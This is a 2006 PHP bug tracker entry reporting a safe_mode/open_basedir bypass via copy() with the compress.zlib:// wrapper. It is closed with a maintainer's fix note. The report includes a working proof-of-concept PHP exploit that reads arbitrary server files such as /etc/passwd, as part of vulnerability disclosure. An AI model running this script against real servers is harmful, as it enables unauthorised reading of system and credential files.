ID: 37071 Updated by: [EMAIL PROTECTED] Reported By: unsecretarygeneral at gmail dot com -Status: Open +Status: Closed Bug Type: Safe Mode/open_basedir Operating System: all PHP Version: 4.4.2 New Comment:
This bug has been fixed in CVS. Snapshots of the sources are packaged every three hours; this change will be in the next snapshot. You can grab the snapshot at http://snaps.php.net/. Thank you for the report, and for helping us make PHP better. The bug isn't in zlib (the inner fopen_wrapper simply passes on the options its given). The problem is in copy() (which passes the wrong options). 5.1 already had the correct flags, but not other branches, I've applied a fix to everywhere else. Previous Comments: ------------------------------------------------------------------------ [2006-04-14 17:08:50] unsecretarygeneral at gmail dot com Now the man Mr Millar has poatched this , please evaluate and incorprate the fix ! http://www.sir-millar.com/blog/?p=5 ------------------------------------------------------------------------ [2006-04-13 13:28:11] unsecretarygeneral at gmail dot com Description: ------------ The zlib fopen function boes not adhere to safe_mode , or open_base directory , hence an attacker can use zlib to compress 'any' file to a temp folder / world writable folder .. This should be critical , and is NOT fixed in the current CVS . Reproduce code: --------------- Example code . : called like http://hostname/?file=/etc/passwd <?php $file=""; // File to Include... or use _GET _POST $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp echo "<PRE>\n"; if(empty($file)) { if(empty($_GET['file'])) { if(empty($_POST['file'])) { die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like ?file=/etc/passwd\n <B><CENTER><FONTCOLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>" ); } else { $file=$_POST['file']; } } else { $file=$_GET['file']; } } $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$file, $temp)) { $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "<B>--- Start File ".htmlspecialchars($file)."-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File".htmlspecialchars($file)." ---------------\n"; unlink($temp); die("\n<FONT COLOR=\"RED\"><B>File".htmlspecialchars($file)." has been already loaded. SecurityReason Team;]</B></FONT>"); } else { die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>"); } ?> Expected result: ---------------- list of /etc/passwd Actual result: -------------- list of /etc/passwd ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=37071&edit=1
